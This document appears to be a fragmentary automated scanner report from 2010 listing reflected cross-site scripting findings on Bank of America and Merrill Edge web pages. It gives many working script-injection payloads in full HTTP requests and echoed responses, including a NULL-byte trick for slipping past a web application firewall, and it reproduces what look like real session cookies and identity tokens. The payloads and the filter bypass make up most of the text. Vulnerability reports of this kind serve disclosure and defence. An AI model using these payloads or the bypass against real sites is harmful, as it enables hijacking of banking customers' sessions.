HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:29:50 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=3049633451.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfc28"><script>alert(1)</script>be7d0f2720f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:29:50 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=482784939.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9550e"><script>alert(1)</script>9a7c33df69a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:29:26 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=2965812907.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59e44"><script>alert(1)</script>0edda56d98c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /small_business59e44"><script>alert(1)</script>0edda56d98c/business_financing/index.cfm?template=overview_loans HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; BIGipServerngen-www.80=423999147.20480.0000; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; cookiecheck=enabled; CFTOKEN=380c459%2D0003ce88%2D78cf%2D1ced%2Daea6%2D834712e34552; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; NSC_CbolPgBnfsjdb=445b320a7852; GEOSERVER=2; cmTPSet=Y; CFID=130456778; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 20:53:57 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=3265705643.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f79c8"><script>alert(1)</script>4dffe2db9fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /small_business/business_financingf79c8"><script>alert(1)</script>4dffe2db9fb/index.cfm?template=overview_loans HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SURVEY_SHOWN_IN_LAST_6_MONTHS=N; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C10%2C5; BIGipServerngen-www.80=423999147.20480.0000; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; cookiecheck=enabled; CFTOKEN=380c459%2D0003ce88%2D78cf%2D1ced%2Daea6%2D834712e34552; CMAVID=none; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; NSC_CbolPgBnfsjdb=445b320a7852; GEOSERVER=2; cmTPSet=Y; CFID=130456778; BOA_0020=20101124%3A0%3AW%3A00040D9A%2D78CF%2D1CED%2DAEA6834712E34552; throttle_value=17;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 20:53:57 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=967227051.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cec9"><script>alert(1)</script>9fb359c4e74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:35:23 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=3267802795.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86601"><script>alert(1)</script>1caa8970828 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /surveys86601"><script>alert(1)</script>1caa8970828/bridge/surveybridge.cfm?surveynumber=9 HTTP/1.1 Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators.bankofamerica.com/locator/locator/ParseAction.do Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BIGipServerngen-www.80=423999147.20480.0000; throttle_value=17; cmTPSet=Y; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; NSC_CbolPgBnfsjdb=445b320a7852
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 20:53:00 GMT Content-type: text/html Page-Completion-Status: Normal Set-Cookie: BIGipServerngen-www.80=1655092907.20480.0000; path=/ Content-Length: 1409
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e3e8"><script>alert(1)</script>ab7f1aefbe0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /surveys/bridge8e3e8"><script>alert(1)</script>ab7f1aefbe0/surveybridge.cfm?surveynumber=9 HTTP/1.1 Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators.bankofamerica.com/locator/locator/ParseAction.do Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BIGipServerngen-www.80=423999147.20480.0000; throttle_value=17; cmTPSet=Y; TCID=0007ad90-1c4f-de5c-8736-a6070000005a; NSC_CbolPgBnfsjdb=445b320a7852
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 20:53:00 GMT Content-type: text/html Page-Completion-Status: Normal Set-Cookie: BIGipServerngen-www.80=1504097963.20480.0000; path=/ Content-Length: 1409
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36316"><script>alert(1)</script>52334d13321 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the blurwindow request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a91a8"%3b4c21ef9e896 was submitted in the blurwindow parameter. This input was echoed as a91a8";4c21ef9e896 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 20:53:06 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: BIGipServerngen-www.80=916895403.20480.0000; path=/ Content-Length: 8399
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 Transitional//EN"> <html lang="en-US"> <title></title> <head>
...[SNIP]... function inviteRespondent() { var popup_url = "/surveys/survey_select.cfm?surveynumber=9&blurwindow=a91a8";4c21ef9e896"; var scrollandresize="no"; if(scrollandresize == 'yes')
The value of the surveynumber request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97009"%3b3bd5ba1c162 was submitted in the surveynumber parameter. This input was echoed as 97009";3bd5ba1c162 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 20:53:03 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: BIGipServerngen-www.80=430356139.20480.0000; path=/ Content-Length: 8730
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 Transitional//EN"> <html lang="en-US"> <title></title> <head>
...[SNIP]... function inviteRespondent() { var popup_url = "/surveys/survey_select.cfm?surveynumber=997009";3bd5ba1c162&blurwindow="; var scrollandresize="no"; if(scrollandresize == 'yes')
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 416d0"><script>alert(1)</script>80670a07013 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8640"><script>alert(1)</script>24a6974ad95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:35:13 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=3016144555.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of the cm_mmc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bba40"%3b41884d9afac was submitted in the cm_mmc parameter. This input was echoed as bba40";41884d9afac in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:35:49 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=CT; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=CT; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=CT; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=CT; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=3217471147.20480.0000; path=/
The value of the cm_mmc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d42c"%20a%3db%20ea0d59fa230 was submitted in the cm_mmc parameter. This input was echoed as 3d42c" a=b ea0d59fa230 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:35:35 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=CT; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=CT; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=CT; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=CT; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=2965812907.20480.0000; path=/
<style type="text/css" media="all"> .stb_newtext { color:#CC0000; } .standard-text1 { col ...[SNIP]... ect" coords="465,123,562,145" alt="Visit the Car Buying Center" href="http://www.bankofamerica.com/carbuyingcenter/?referrer_id=ZBOAAWL0001FI&cm_mmc=eLend-Auto-_-BAC-Homepage-_-AutoLoans-_-TextLink3d42c" a=b ea0d59fa230"> ...[SNIP]...
The value of the state cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93645"><script>alert(1)</script>0e03dbfca31 was submitted in the state cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 404 Not found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 24 Nov 2010 22:28:21 GMT Set-Cookie: TLTSID=79380BC8F80C10F8E1D4839ABB9D4682; Path=/; Domain=.bankofamerica.com Set-Cookie: TLTUID=79380BC8F80C10F8E1D4839ABB9D4682; Path=/; Domain=.bankofamerica.com; Expires=Wed, 24-11-2020 22:28:21 GMT P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description" content="Plea ...[SNIP]... <a href="http://www.bankofamerica.com/contact/?statecheck=CT93645"><script>alert(1)</script>0e03dbfca31"> ...[SNIP]...
The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00da3c7'-alert(1)-'a19ed63c6f4 was submitted in the d parameter. This input was echoed as da3c7'-alert(1)-'a19ed63c6f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /M/WebResource.axd?d=whzhnKw2EsLp_zO8-lOxmA2%00da3c7'-alert(1)-'a19ed63c6f4&t=634117208009446227 HTTP/1.1 Host: www.merrilledge.com Proxy-Connection: keep-alive Referer: http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx?cm_sp=GWM-MerrillEdge-_-BAU%20Homepage%20CMS%20Default%20Ads-_-GZ16LT000X_HP-Def-Highlight_gwim-024_hlt_direct-v3_arq031i4.jpg Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:00:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8991
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head id ...[SNIP]... <script type="text/javascript" language="javascript">gObjMLOSEJsLibrary.writeErrorMessage('e1818853-72ad-4762-ad9e-eeb0aae61628', '/m/webresource.axd?d=whzhnkw2eslp_zo8-loxma2%00da3c7'-alert(1)-'a19ed63c6f4&t=634117208009446227', "Invalid character in a Base-64 string.");</script> ...[SNIP]...
2.39. http://www.merrilledge.com/m/System/SearchResults.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.merrilledge.com
Path:
/m/System/SearchResults.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0034f69"><script>alert(1)</script>dd5043bce68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 34f69"><script>alert(1)</script>dd5043bce68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/System/SearchResults.aspx?%0034f69"><script>alert(1)</script>dd5043bce68=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B87218; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:01:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 61850
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> Online Sales
2.40. http://www.merrilledge.com/m/pages/bank-products.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.merrilledge.com
Path:
/m/pages/bank-products.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0097495"><script>alert(1)</script>2ee8ae7bab4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 97495"><script>alert(1)</script>2ee8ae7bab4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/bank-products.aspx?%0097495"><script>alert(1)</script>2ee8ae7bab4=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B87218; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:00:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 80051
2.41. http://www.merrilledge.com/m/pages/documents-forms.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.merrilledge.com
Path:
/m/pages/documents-forms.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009f001"><script>alert(1)</script>97152d333d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f001"><script>alert(1)</script>97152d333d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
